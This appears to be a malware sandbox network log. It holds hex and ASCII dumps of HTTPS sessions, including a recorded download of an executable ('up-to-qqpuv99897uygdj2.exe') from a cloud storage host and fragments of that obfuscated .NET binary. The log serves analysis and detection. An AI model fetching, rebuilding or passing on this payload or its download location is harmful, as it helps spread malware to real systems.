5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 4d 65 6d 62 65 72 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00
                                                                                                                          Data Ascii: Length>k__BackingField<MaximumLength>k__BackingField<Minimum>k__BackingField<ExclusiveMinimum>k__BackingField<Maximum>k__BackingField<ExclusiveMaximum>k__BackingField<Enum>k__BackingField<Hidden>k__BackingField<MemberSerialization>k__BackingField
                                                                                                                          2022-05-21 07:32:24 UTC965INData Raw: 6e 69 6d 75 6d 00 67 65 74 5f 4d 61 78 69 6d 75 6d 00 73 65 74 5f 4d 61 78 69 6d 75 6d 00 67 65 74 5f 45 78 63 6c 75 73 69 76 65 4d 61 78 69 6d 75 6d 00 73 65 74 5f 45 78 63 6c 75 73 69 76 65 4d 61 78 69 6d 75 6d 00 67 65 74 5f 45 6e 75 6d 00 73 65 74 5f 45 6e 75 6d 00 67 65 74 5f 49 73 45 6e 75 6d 00 41 72 67 75 6d 65 6e 74 54 79 70 65 49 73 45 6e 75 6d 00 50 72 6f 63 65 73 73 45 6e 75 6d 00 4f 70 74 49 6e 00 56 61 6c 69 64 61 74 65 42 6f 6f 6c 65 61 6e 00 53 71 6c 42 6f 6f 6c 65 61 6e 00 54 6f 42 6f 6f 6c 65 61 6e 00 6f 70 5f 4c 65 73 73 54 68 61 6e 00 54 69 6d 65 53 70 61 6e 00 67 65 74 5f 48 69 64 64 65 6e 00 73 65 74 5f 48 69 64 64 65 6e 00 43 72 65 61 74 65 4a 54 6f 6b 65 6e 00 67 65 74 5f 54 6f 6b 65 6e 00 41 64 64 54 6f 6b 65 6e 00 49 73 45 6e 64
                                                                                                                          Data Ascii: nimumget_Maximumset_Maximumget_ExclusiveMaximumset_ExclusiveMaximumget_Enumset_Enumget_IsEnumArgumentTypeIsEnumProcessEnumOptInValidateBooleanSqlBooleanToBooleanop_LessThanTimeSpanget_Hiddenset_HiddenCreateJTokenget_TokenAddTokenIsEnd
                                                                                                                          2022-05-21 07:32:24 UTC981INData Raw: 65 6e 74 00 5f 64 6f 63 75 6d 65 6e 74 00 49 6e 69 74 69 61 6c 69 7a 65 43 6f 6d 70 6f 6e 65 6e 74 00 63 6f 6d 70 6f 6e 65 6e 74 00 67 65 74 5f 50 61 72 65 6e 74 00 73 65 74 5f 50 61 72 65 6e 74 00 41 64 64 50 61 72 65 6e 74 00 52 65 6d 6f 76 65 50 61 72 65 6e 74 00 5f 70 61 72 65 6e 74 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 2e 49 45 6e 75 6d 65 72 61 74 6f 72 3c 53 79 73 74 65 6d 2e 49 6e 74 33 32 3e 2e 43 75 72 72 65 6e 74 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 2e 49 45 6e 75 6d 65 72 61 74 6f 72 3c 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 2e 4b 65 79 56 61 6c 75 65 50 61 69 72 3c 53 79 73 74 65 6d 2e 53 74 72 69 6e 67 2c 4e 65 77 74
                                                                                                                          Data Ascii: ent_documentInitializeComponentcomponentget_Parentset_ParentAddParentRemoveParent_parentSystem.Collections.Generic.IEnumerator<System.Int32>.CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,Newt
                                                                                                                          2022-05-21 07:32:24 UTC997INData Raw: 00 64 00 00 3d 55 00 6e 00 65 00 78 00 70 00 65 00 63 00 74 00 65 00 64 00 20 00 44 00 61 00 74 00 65 00 54 00 69 00 6d 00 65 00 4b 00 69 00 6e 00 64 00 20 00 76 00 61 00 6c 00 75 00 65 00 2e 00 00 15 64 00 69 00 63 00 74 00 69 00 6f 00 6e 00 61 00 72 00 79 00 00 49 45 00 6e 00 75 00 6d 00 20 00 74 00 79 00 70 00 65 00 20 00 7b 00 30 00 7d 00 20 00 69 00 73 00 20 00 6e 00 6f 00 74 00 20 00 61 00 20 00 73 00 65 00 74 00 20 00 6f 00 66 00 20 00 66 00 6c 00 61 00 67 00 73 00 2e 00 00 11 65 00 6e 00 75 00 6d 00 54 00 79 00 70 00 65 00 00 81 01 56 00 61 00 6c 00 75 00 65 00 20 00 66 00 72 00 6f 00 6d 00 20 00 65 00 6e 00 75 00 6d 00 20 00 77 00 69 00 74 00 68 00 20 00 74 00 68 00 65 00 20 00 75 00 6e 00 64 00 65 00 72 00 6c 00 79 00 69 00 6e 00 67 00 20 00 74
                                                                                                                          Data Ascii: d=Unexpected DateTimeKind value.dictionaryIEnum type {0} is not a set of flags.enumTypeValue from enum with the underlying t
                                                                                                                          2022-05-21 07:32:24 UTC1013INData Raw: 72 00 6f 00 72 00 20 00 72 00 65 00 61 00 64 00 69 00 6e 00 67 00 20 00 62 00 79 00 74 00 65 00 73 00 2e 00 20 00 45 00 78 00 70 00 65 00 63 00 74 00 65 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 62 00 75 00 74 00 20 00 67 00 6f 00 74 00 20 00 7b 00 30 00 7d 00 2e 00 00 6b 45 00 72 00 72 00 6f 00 72 00 20 00 72 00 65 00 61 00 64 00 69 00 6e 00 67 00 20 00 64 00 65 00 63 00 69 00 6d 00 61 00 6c 00 2e 00 20 00 45 00 78 00 70 00 65 00 63 00 74 00 65 00 64 00 20 00 61 00 20 00 6e 00 75 00 6d 00 62 00 65 00 72 00 20 00 62 00 75 00 74 00 20 00 67 00 6f 00 74 00 20 00 7b 00 30 00 7d 00 2e 00 00 6b 45 00 72 00 72 00 6f 00 72 00 20 00 72 00 65 00 61 00 64 00 69 00 6e 00 67 00 20 00 69 00 6e 00 74 00 65 00 67 00 65 00 72 00 2e 00 20 00 45 00 78 00 70 00 65
                                                                                                                          Data Ascii: ror reading bytes. Expected bytes but got {0}.kError reading decimal. Expected a number but got {0}.kError reading integer. Expe
                                                                                                                          2022-05-21 07:32:24 UTC1029INData Raw: 08 12 81 19 07 15 12 81 34 01 1e 00 06 15 12 80 99 01 0e 06 15 12 80 99 01 1c 07 15 12 81 30 01 1e 00 06 20 02 01 0e 13 00 0c 15 12 81 2d 01 15 12 81 30 01 1e 00 06 15 12 80 ad 01 1c 0f 07 03 15 12 69 01 1c 15 12 75 01 12 81 69 1c 05 15 12 69 01 1c 06 20 00 1d 12 81 69 08 15 12 18 02 12 81 69 02 05 0a 01 12 81 69 07 15 12 65 01 12 81 69 07 15 12 75 01 12 81 69 11 07 03 15 12 69 01 0e 15 12 75 01 12 81 69 12 81 69 07 15 12 81 30 01 13 00 08 07 05 1d 03 08 08 03 0e 04 20 00 1d 03 0c 07 03 12 81 05 15 11 80 b1 01 08 0e 04 07 01 1d 03 0a 00 03 01 12 80 a5 12 80 a5 08 07 15 12 84 14 01 1e 00 07 06 15 12 18 02 1c 02 08 06 15 12 84 14 01 13 00 06 15 12 18 02 1c 02 06 15 12 81 48 01 1c 06 20 01 01 12 81 91 16 07 03 12 84 18 12 80 ed 15 12 1c 03 12 80 ed 15 12 80
                                                                                                                          Data Ascii: 40 -0iuii iiieiuiiuii0 H
                                                                                                                          2022-05-21 07:32:24 UTC1045INData Raw: 99 01 12 81 90 09 00 02 01 12 81 6c 12 81 90 08 20 01 12 81 6c 12 81 90 0b 20 02 12 81 78 12 81 78 12 81 90 15 20 02 01 15 12 81 85 02 0e 12 81 90 15 12 81 85 02 0e 12 81 78 10 20 03 01 15 12 81 85 02 0e 12 81 78 0e 12 81 90 0a 20 03 01 12 81 78 08 12 81 90 09 20 02 01 12 81 78 12 81 90 08 20 01 12 81 6c 12 81 78 06 20 01 0e 12 81 78 0a 20 00 15 12 81 c9 01 12 81 90 0b 20 01 01 15 12 81 c9 01 12 81 90 0b 20 00 15 12 80 b5 02 0e 12 81 78 0c 20 01 01 15 12 80 b5 02 0e 12 81 78 09 20 00 15 12 69 01 12 81 78 0a 20 01 01 15 12 69 01 12 81 78 05 20 00 12 81 78 06 20 01 01 12 81 78 08 20 01 12 81 78 12 81 90 0a 00 01 0e 15 12 65 01 12 81 90 0a 20 00 15 12 80 99 01 12 81 90 0b 20 01 01 15 12 80 99 01 12 81 90 06 20 01 12 81 90 0e 09 20 02 01 12 80 d8 12 81 7c 10
                                                                                                                          Data Ascii: l l xx x x x x lx x x x ix ix x x xe |
                                                                                                                          2022-05-21 07:32:24 UTC1061INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 03 00 00 00 30 00 00 80 0e 00 00 00 48 00 00 80 10 00 00 00 60 00 00 80 18 00 00 00 78 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 90 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 7f 00 00 a8 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 c0 00 00 80 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: 0H`x
                                                                                                                          2022-05-21 07:32:24 UTC1077INData Raw: 4b 7c d0 3c d0 39 01 3d d0 75 21 7a a0 fb 12 f4 c0 07 cb d0 03 3d 56 e4 de 08 54 0e 00 d1 f8 55 00 80 c6 6f 07 80 bb fd 05 01 10 fd e1 9f 0a 00 22 f1 7b 00 dc e4 c7 fd dd e2 8b 57 eb 98 f0 92 01 43 2f 03 86 b9 35 bb c6 7f 5d ab 6b dc d5 40 00 c8 73 7f 97 05 e8 fe ae 8b 50 cd 6e 8b 51 cd ee cb 50 cd 0f f9 f1 cb 02 20 12 bf 93 00 84 30 00 60 6d 7f 19 00 4a b7 a1 03 40 8b df 03 c0 3b 94 8f 7a ad b7 fc 15 bf 84 a8 d2 29 36 b2 5a a7 d8 71 d5 3b c6 af ab d9 29 fe 54 10 00 9d e3 7c 53 b3 53 6c de 18 bf 5e d3 38 5b a8 61 c0 50 a3 fb 52 54 e3 83 e5 81 a7 ff 0c 00 68 f1 3b 01 00 eb fe 7f a0 ed 2f 00 00 fb 9e 7f ee 01 40 8a df 04 c0 1a bf 07 80 77 10 8f 7b 22 e7 de 5b b5 73 fc 5b f7 b5 8f ed 5f b5 6d cc b2 1a 9d 62 0f d4 ec 18 77 3d 00 00 63 6a 74 b4 4f 1c aa d1 79
                                                                                                                          Data Ascii: K|<9=u!z=VTUo"{WC/5]k@sPnQP 0`mJ@;z)6Zq;)T|SSl^8[aPRTh;/@w{"[s[_mbw=cjtOy


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          5192.168.2.449799151.115.10.1443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:32:35 UTC1081OUTGET /ultimate/up-to-qqpuv99897uygdj2.exe HTTP/1.1
                                                                                                                          Host: yuuichirou-hanma.s3.pl-waw.scw.cloud
                                                                                                                          2022-05-21 07:32:36 UTC1081INHTTP/1.1 200 OK
                                                                                                                          Content-Length: 440832
                                                                                                                          x-amz-id-2: tx6998d89cc7c24f44ba505-0062889593
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Last-Modified: Wed, 04 May 2022 23:37:43 GMT
                                                                                                                          ETag: "71ab0d34fe3b647ee1ba179c84c89cfe"
                                                                                                                          x-amz-request-id: tx6998d89cc7c24f44ba505-0062889593
                                                                                                                          x-amz-version-id: 1651707463002395
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Date: Sat, 21 May 2022 07:32:36 GMT
                                                                                                                          Connection: close
                                                                                                                          2022-05-21 07:32:36 UTC1082INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c8 74 72 62 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 5c 06 00 00 5a 00 00 00 00 00 00 4e 7a 06 00 00 20 00 00 00 80 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 07 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELtrb.\ZNz @ @
                                                                                                                          2022-05-21 07:32:36 UTC1097INData Raw: 1b 00 00 04 6f 94 03 00 06 73 70 00 00 0a 16 28 c1 00 00 06 0b 20 01 00 00 00 38 2f ff ff ff 04 20 f6 03 00 00 28 cb 00 00 06 20 7a 01 00 00 28 cb 00 00 06 28 d9 00 00 06 20 0f 00 00 00 38 0b ff ff ff 09 28 d7 00 00 06 39 1a 01 00 00 20 0c 00 00 00 28 c3 00 00 06 3a f1 fe ff ff 26 07 39 04 01 00 00 20 0b 00 00 00 38 e0 fe ff ff 06 03 7d 1b 00 00 04 20 05 00 00 00 38 cf fe ff ff 06 7b 1b 00 00 04 28 c9 00 00 06 28 ca 00 00 06 39 b3 00 00 00 20 12 00 00 00 38 b0 fe ff ff 38 bb ff ff ff 17 0b 20 02 00 00 00 16 39 9e fe ff ff 26 20 80 03 00 00 28 cb 00 00 06 06 7b 1b 00 00 04 28 cc 00 00 06 28 cd 00 00 06 0c 28 c3 00 00 06 28 c4 00 00 06 3a 4d 00 00 00 26 20 02 00 00 00 28 c4 00 00 06 3a 23 00 00 00 38 1e 00 00 00 73 72 00 00 0a 08 28 ce 00 00 06 0c 38 22 00
                                                                                                                          Data Ascii: osp( 8/ ( z(( 8(9 (:&9 8} 8{((9 88 9& ({((((:M& (:#8sr(8"
                                                                                                                          2022-05-21 07:32:36 UTC1112INData Raw: 16 2d f9 fe 09 00 00 28 60 00 00 0a 2a 00 00 00 66 2b 09 28 3b b2 34 65 14 16 9a 26 16 2d f9 00 fe 09 00 00 28 6d 04 00 06 2a 00 00 96 2b 09 28 45 05 0f 5d 14 16 9a 26 16 2d f9 00 fe 09 00 00 fe 09 01 00 fe 09 02 00 fe 09 03 00 28 89 00 00 0a 2a 00 00 62 2b 09 28 f4 dc 1b 4d 14 16 9a 26 16 2d f9 fe 09 00 00 6f ba 01 00 06 2a 00 00 00 13 30 03 00 be 00 00 00 01 00 00 11 2b 09 28 4d 4b 08 3a 14 16 9a 26 16 2d f9 20 00 00 00 00 38 49 00 00 00 28 bc 01 00 06 28 be 01 00 06 28 bf 01 00 06 3a 6f 00 00 00 26 20 05 00 00 00 38 2a 00 00 00 02 05 7d 3a 00 00 04 20 07 00 00 00 38 19 00 00 00 02 04 7d 38 00 00 04 38 52 00 00 00 20 00 00 00 00 fe 0e 00 00 fe 0c 00 00 45 08 00 00 00 92 ff ff ff 0a 00 00 00 10 00 00 00 b1 ff ff ff 20 00 00 00 0a 00 00 00 c2 ff ff ff 37
                                                                                                                          Data Ascii: -(`*f+(;4e&-(m*+(E]&-(*b+(M&-o*0+(MK:&- 8I(((:o& 8*}: 8}88R E 7
                                                                                                                          2022-05-21 07:32:36 UTC1128INData Raw: 2a 00 00 00 42 2b 09 28 a4 d2 05 51 14 16 9a 26 16 2d f9 16 2a 00 00 00 7e 2b 09 28 6d b9 2f 6a 14 16 9a 26 16 2d f9 28 c5 02 00 06 28 c6 02 00 06 02 28 c7 02 00 06 2a a6 2b 09 28 48 f6 54 50 14 16 9a 26 16 2d f9 28 ca 02 00 06 7e 22 01 00 0a 26 20 c6 31 00 00 28 cb 02 00 06 28 cc 02 00 06 2a 00 00 1b 30 04 00 d7 01 00 00 33 00 00 11 2b 09 28 18 38 29 55 14 16 9a 26 16 2d f9 17 28 c9 02 00 06 3a 24 00 00 00 26 20 04 00 00 00 38 79 00 00 00 20 e0 31 00 00 28 cb 02 00 06 28 cd 02 00 06 39 39 00 00 00 38 0b 00 00 00 26 20 05 00 00 00 38 55 00 00 00 20 ee 31 00 00 28 cb 02 00 06 20 18 32 00 00 28 cb 02 00 06 73 23 01 00 0a 0a 20 02 00 00 00 38 31 00 00 00 38 5b 00 00 00 20 58 32 00 00 28 cb 02 00 06 20 18 32 00 00 28 cb 02 00 06 73 23 01 00 0a 0a 38 3c 00 00
                                                                                                                          Data Ascii: *B+(Q&-*~+(m/j&-(((*+(HTP&-(~"& 1((*03+(8)U&-(:$& 8y 1((998& 8U 1( 2(s# 818[ X2( 2(s#8<
                                                                                                                          2022-05-21 07:32:36 UTC1144INData Raw: fe 09 00 00 28 e1 01 00 06 2a 00 00 86 2b 09 28 e9 6c 65 64 14 16 9a 26 16 2d f9 00 fe 09 00 00 fe 09 01 00 fe 09 02 00 28 5b 00 00 0a 2a 00 00 42 2b 09 28 67 1b 1a 54 14 16 9a 26 16 2d f9 17 2a 00 00 00 42 2b 09 28 0c d3 43 4f 14 16 9a 26 16 2d f9 16 2a 00 00 00 66 2b 09 28 d4 82 32 68 14 16 9a 26 16 2d f9 00 fe 09 00 00 28 bd 03 00 06 2a 00 00 56 2b 09 28 4e 7e 76 45 14 16 9a 26 16 2d f9 00 28 77 00 00 0a 2a 00 00 72 2b 09 28 d1 5f 15 47 14 16 9a 26 16 2d f9 fe 09 00 00 fe 09 01 00 6f 82 00 00 0a 2a 00 00 00 76 2b 09 28 1f 7c 21 41 14 16 9a 26 16 2d f9 00 fe 09 00 00 fe 09 01 00 28 7b 00 00 0a 2a 00 00 66 2b 09 28 3d 2e 06 65 14 16 9a 26 16 2d f9 00 fe 09 00 00 28 3f 00 00 0a 2a 00 00 76 2b 09 28 04 95 13 58 14 16 9a 26 16 2d f9 00 fe 09 00 00 fe 09 01
                                                                                                                          Data Ascii: (*+(led&-([*B+(gT&-*B+(CO&-*f+(2h&-(*V+(N~vE&-(w*r+(_G&-o*v+(|!A&-({*f+(=.e&-(?*v+(X&-
                                                                                                                          2022-05-21 07:32:36 UTC1160INData Raw: 0e 34 00 17 3a 55 1c 00 00 fe 0c 1a 00 20 12 00 00 00 fe 0c 31 00 9c 20 85 01 00 00 38 39 1c 00 00 11 12 38 95 26 00 00 20 26 00 00 00 fe 0e 34 00 17 3a 27 1c 00 00 20 dd 00 00 00 20 49 00 00 00 59 fe 0e 31 00 20 a7 00 00 00 38 12 1c 00 00 20 cc 00 00 00 20 44 00 00 00 59 fe 0e 1b 00 20 29 01 00 00 fe 0e 34 00 38 f1 1b 00 00 11 16 11 32 11 32 8e 69 17 11 11 58 59 91 60 13 16 20 70 01 00 00 38 da 1b 00 00 fe 0c 1a 00 20 0b 00 00 00 fe 0c 31 00 9c 20 c4 00 00 00 38 ba 1b 00 00 fe 0c 19 00 20 0d 00 00 00 20 9a 00 00 00 20 33 00 00 00 59 9c 20 6d 01 00 00 fe 0e 34 00 38 04 26 00 00 3a 96 1b 00 00 20 ba 00 00 00 20 3e 00 00 00 59 fe 0e 31 00 20 4d 01 00 00 38 81 1b 00 00 fe 0c 1a 00 20 17 00 00 00 fe 0c 31 00 9c 20 2b 01 00 00 38 69 1b 00 00 fe 0c 1a 00 20 0a
                                                                                                                          Data Ascii: 4:U 1 898& &4:' IY1 8 DY )4822iXY` p8 1 8 3Y m48&: >Y1 M8 1 +8i
                                                                                                                          2022-05-21 07:32:36 UTC1176INData Raw: 1d 00 00 fc 03 00 00 14 01 00 00 07 f3 ff ff f0 0f 00 00 6f 17 00 00 dc 18 00 00 7a 04 00 00 a2 14 00 00 73 1e 00 00 68 05 00 00 4e 09 00 00 37 0c 00 00 38 0a 00 00 91 0b 00 00 b3 f9 ff ff ac 1c 00 00 ff f8 ff ff 89 1d 00 00 2d f5 ff ff 76 22 00 00 3d 0b 00 00 25 0a 00 00 98 00 00 00 06 1d 00 00 55 06 00 00 0a 07 00 00 70 f2 ff ff 8d f5 ff ff 7b 1a 00 00 88 f7 ff ff 29 00 00 00 33 01 00 00 23 07 00 00 45 19 00 00 5b 10 00 00 fb f1 ff ff 3b 1d 00 00 5e 0d 00 00 c7 0a 00 00 ee 05 00 00 9f 13 00 00 96 16 00 00 25 15 00 00 1c 11 00 00 7e f1 ff ff 6c 1d 00 00 f6 1e 00 00 fd 15 00 00 2a 21 00 00 e8 17 00 00 d2 04 00 00 09 08 00 00 e4 22 00 00 a1 0f 00 00 44 04 00 00 72 0b 00 00 29 10 00 00 5e f4 ff ff a2 21 00 00 25 14 00 00 da 16 00 00 ed 0d 00 00 59 0c 00 00
                                                                                                                          Data Ascii: ozshN78-v"=%Up{)3#E[;^%~l*!"Dr)^!%Y
                                                                                                                          2022-05-21 07:32:36 UTC1192INData Raw: 57 b5 a2 3d 09 0f 00 00 00 00 00 00 00 00 00 00 02 00 00 00 de 00 00 00 47 00 00 00 c9 00 00 00 fa 04 00 00 c4 01 00 00 91 01 00 00 14 01 00 00 03 00 00 00 07 00 00 00 5f 00 00 00 0d 00 00 00 40 00 00 00 7c 00 00 00 02 00 00 00 12 00 00 00 04 00 00 00 09 00 00 00 02 00 00 00 07 00 00 00 02 00 00 00 1b 00 00 00 01 00 00 00 04 00 00 00 00 00 69 02 01 00 00 00 ff ff 00 00 00 00 02 00 00 00 ff ff 06 00 09 00 29 00 06 00 58 00 5d 00 06 00 64 00 5d 00 06 00 6a 00 5d 00 06 00 72 00 29 00 06 00 90 00 a4 00 1b 00 b7 00 00 00 06 00 c6 00 dd 00 06 00 ef 00 5d 00 06 00 f6 00 dd 00 06 00 13 01 dd 00 06 00 32 01 dd 00 06 00 4b 01 dd 00 06 00 64 01 dd 00 06 00 7f 01 dd 00 06 00 9a 01 ae 01 06 00 cd 01 ae 01 06 00 db 01 dd 00 06 00 f8 01 29 00 06 00 10 02 dd 00 06 00 2b
                                                                                                                          Data Ascii: W=G_@|i)X]d]j]r)]2Kd)+
                                                                                                                          2022-05-21 07:32:36 UTC1208INData Raw: aa 63 76 00 07 01 a0 0b 01 00 08 00 86 08 bd 63 b8 02 08 01 b8 0b 01 00 08 00 86 08 c6 63 76 00 08 01 d0 0b 01 00 08 00 86 08 cf 63 b8 02 09 01 e8 0b 01 00 08 00 86 08 d7 63 76 00 09 01 00 0c 01 00 08 00 86 08 df 63 b8 02 0a 01 18 0c 01 00 08 00 86 08 e9 63 76 00 0a 01 30 0c 01 00 08 00 86 08 f3 63 61 05 0b 01 48 0c 01 00 08 00 86 08 fb 63 55 05 0b 01 60 0c 01 00 08 00 86 08 03 64 61 05 0c 01 78 0c 01 00 08 00 86 08 0c 64 55 05 0c 01 90 0c 01 00 08 00 86 08 15 64 b8 02 0d 01 a8 0c 01 00 08 00 86 08 21 64 76 00 0d 01 c0 0c 01 00 08 00 86 08 2d 64 b8 02 0e 01 d8 0c 01 00 08 00 86 08 38 64 76 00 0e 01 f0 0c 01 00 08 00 86 08 43 64 b8 02 0f 01 08 0d 01 00 08 00 86 08 4b 64 76 00 0f 01 20 0d 01 00 08 00 86 08 45 35 b8 02 10 01 38 0d 01 00 08 00 86 08 3d 35 76
                                                                                                                          Data Ascii: cvccvccvccv0caHcU`daxdUd!dv-d8dvCdKdv E58=5v
                                                                                                                          2022-05-21 07:32:36 UTC1224INData Raw: 63 6e 63 64 44 55 00 58 4b 67 32 30 72 59 79 43 58 72 74 4e 6a 4a 35 31 66 00 70 6d 30 55 6a 4f 57 6a 44 68 42 59 75 4b 53 46 6d 34 00 57 52 31 59 43 6b 73 35 47 52 72 50 42 63 70 4d 77 41 00 56 61 6c 75 65 54 79 70 65 00 68 62 6d 55 48 4e 41 6d 49 4c 70 4f 35 41 44 73 6f 33 00 6b 4b 46 6f 6d 78 54 43 59 79 4e 66 57 6e 51 64 68 32 00 76 5a 59 30 56 65 44 47 45 73 54 47 6b 66 56 44 35 4d 00 43 71 4f 64 6f 42 64 67 73 48 76 65 6d 67 4c 59 44 4d 00 74 4a 6c 68 61 48 6b 65 78 63 4e 6e 74 74 34 51 36 77 00 4b 47 57 55 44 74 62 33 41 6b 58 6a 47 30 56 79 6f 59 00 67 37 43 6f 39 4d 33 68 49 70 76 79 43 35 4e 51 34 64 00 3c 50 72 69 76 61 74 65 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 44 65 74 61 69 6c 73 3e 7b 41 39 34 44 42 37 39 32 2d 35 42 38 31 2d 34 41 38
                                                                                                                          Data Ascii: cncdDUXKg20rYyCXrtNjJ51fpm0UjOWjDhBYuKSFm4WR1YCks5GRrPBcpMwAValueTypehbmUHNAmILpO5ADso3kKFomxTCYyNfWnQdh2vZY0VeDGEsTGkfVD5MCqOdoBdgsHvemgLYDMtJlhaHkexcNntt4Q6wKGWUDtb3AkXjG0VyoYg7Co9M3hIpvyC5NQ4d<PrivateImplementationDetails>{A94DB792-5B81-4A8
                                                                                                                          2022-05-21 07:32:36 UTC1241INData Raw: 62 42 49 31 70 41 59 67 79 00 57 57 6a 6e 6d 30 4f 4d 76 34 30 70 41 56 79 6d 75 67 73 00 59 55 48 4d 30 4c 4f 6e 4b 4f 6c 45 39 4d 67 65 70 32 64 00 45 6f 32 74 75 31 4f 34 42 4e 39 42 45 76 43 74 69 6e 76 00 54 36 48 55 68 44 4f 52 6b 36 52 30 48 4a 70 42 50 49 77 00 6c 70 49 30 4d 53 4f 65 49 54 30 76 32 56 64 55 70 52 79 00 4f 46 33 51 75 4a 4f 4a 37 6d 38 45 30 46 52 59 66 48 52 00 4e 51 61 50 6a 42 4f 68 76 4b 37 67 68 47 6d 33 56 4f 42 00 51 35 76 56 72 32 4f 50 36 6b 57 6f 72 73 32 47 4d 45 6a 00 6c 46 4b 6f 62 4c 4f 74 61 31 48 4d 33 55 30 54 46 37 52 00 68 42 78 31 4b 79 4f 70 37 53 41 56 61 76 66 33 4c 69 79 00 47 65 74 50 72 6f 63 65 73 73 65 73 42 79 4e 61 6d 65 00 50 34 77 65 62 30 4f 6f 4f 58 77 31 51 4d 31 65 30 50 66 00 42 48 69 70 33 72
                                                                                                                          Data Ascii: bBI1pAYgyWWjnm0OMv40pAVymugsYUHM0LOnKOlE9Mgep2dEo2tu1O4BN9BEvCtinvT6HUhDORk6R0HJpBPIwlpI0MSOeIT0v2VdUpRyOF3QuJOJ7m8E0FRYfHRNQaPjBOhvK7ghGm3VOBQ5vVr2OP6kWors2GMEjlFKobLOta1HM3U0TF7RhBx1KyOp7SAVavf3LiyGetProcessesByNameP4web0OoOXw1QM1e0PfBHip3r
                                                                                                                          2022-05-21 07:32:36 UTC1257INData Raw: 12 80 94 04 20 00 13 00 03 20 00 02 0f 00 05 01 15 12 80 e9 01 12 80 a4 1c 1c 1c 08 03 00 00 1c 05 00 00 12 80 f9 03 20 00 0e 06 00 03 01 1c 1c 1c 08 15 12 80 e9 01 12 80 a4 03 00 00 08 05 00 01 0e 1d 0e 05 00 00 12 81 01 05 00 02 0e 0e 0e 04 00 01 02 1c 04 00 01 02 0e 04 00 01 0e 0e 05 00 02 02 1c 1c 04 20 01 02 0e 06 00 03 1c 1c 1c 1c 06 00 03 0e 0e 0e 0e 05 00 00 11 81 0d 07 00 02 01 1c 11 81 0d 06 20 01 01 11 81 0d 07 00 02 01 1c 11 81 15 06 20 01 01 11 81 15 04 00 00 1d 0e 04 07 01 1d 0e 05 00 01 1d 0e 1c 06 07 03 0e 1d 0e 08 09 07 04 12 81 21 1c 1d 0e 08 04 06 12 81 21 09 00 04 1c 1c 1c 1c 11 81 2d 09 00 04 0e 0e 0e 0e 11 81 2d 06 20 01 1d 0e 1d 03 06 20 01 12 81 21 0e 04 20 01 1c 0e 09 06 15 12 80 e9 01 12 80 a4 02 06 1c 08 06 15 12 80 e9 01 12 20
                                                                                                                          Data Ascii: !!-- !
                                                                                                                          2022-05-21 07:32:36 UTC1273INData Raw: 54 b5 80 c5 65 6b 39 54 86 e5 b0 72 8c 1d bf 9e 95 4f 41 f0 83 8d 6c c9 22 e4 51 3c ed b5 25 7d 1f d0 f8 68 fe 7b 96 93 79 78 dc fa 87 3e 2a c7 5a 61 a3 cb 2a e5 37 02 56 67 de ae 58 29 53 e2 75 8b 02 7f 74 c7 7b fc 96 e6 0c 93 7a b3 27 e4 dc 74 8b ee 79 4e cc 9b 6e da 9b 3c d7 9e a3 25 e0 7d dd 3d 36 e3 8d a2 f5 70 fc 31 08 ac 3b f5 95 95 88 54 c7 00 43 05 5e 6c 70 91 20 ac 5e 4b 4f fb 2f b8 1e 86 1f 16 ec 78 f8 cf cf 7e dd 10 33 99 10 5a 06 2e 5d 8d 60 92 53 ed 18 a0 aa 70 6a d4 92 43 dd 04 e6 fb e3 10 c8 27 40 c7 b7 fc bd 7e 82 96 96 e6 c0 9e c3 4b c8 77 25 83 19 50 49 93 ec c9 02 b7 15 09 de 60 5c 42 b1 17 dc 1e 9c c0 14 22 8c b8 a9 0b 60 8c f4 dc 0c 99 a4 1a e3 e9 76 0c 58 09 7c ab 54 1c 